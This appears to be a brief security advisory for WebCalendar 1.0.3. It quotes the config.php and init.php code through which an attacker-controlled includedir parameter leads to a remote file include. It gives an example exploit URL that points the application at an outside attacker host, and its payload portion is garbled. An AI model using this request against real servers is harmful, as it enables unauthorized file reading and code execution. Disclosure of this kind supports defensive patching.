|
|
Version: WebCalendar-1.0.3=0D
=0D
Type: Reading of any files=0D
=0D
Description:=0D
-----------------------------=0D
includes/config.php:=0D
line 64=0D
=0D
if ( ! empty ( $includedir ) ) =0D
$fd = @fopen ( "$includedir/settings.php", "rb", true );=0D
=0D
......=0D
=0D
while ( ! feof ( $fd ) ) {=0D
$data .= fgets ( $fd, 4096 );=0D
}=0D
=0D
$configLines = explode ( "\n", $data );=0D
=0D
for ( $n = 0; $n < count ( $configLines ); $n++ ) {=0D
......=0D
$settings[$matches[1]] = $matches[2];=0D
......=0D
=0D
$user_inc = $settings['user_inc'];=0D
......=0D
=0D
includes/init.php=0D
include_once "includes/$user_inc";=0D
=0D
Example:=0D
---------------------------------------=0D
index.php?includedir=http://attacker_host=0D
where in attacker_host exists file settings.php , which content=0D
=0D
"=0D
';=0D
=0D
?> =0D
"=0D
=0D
Requirements=0D
register_globals = On;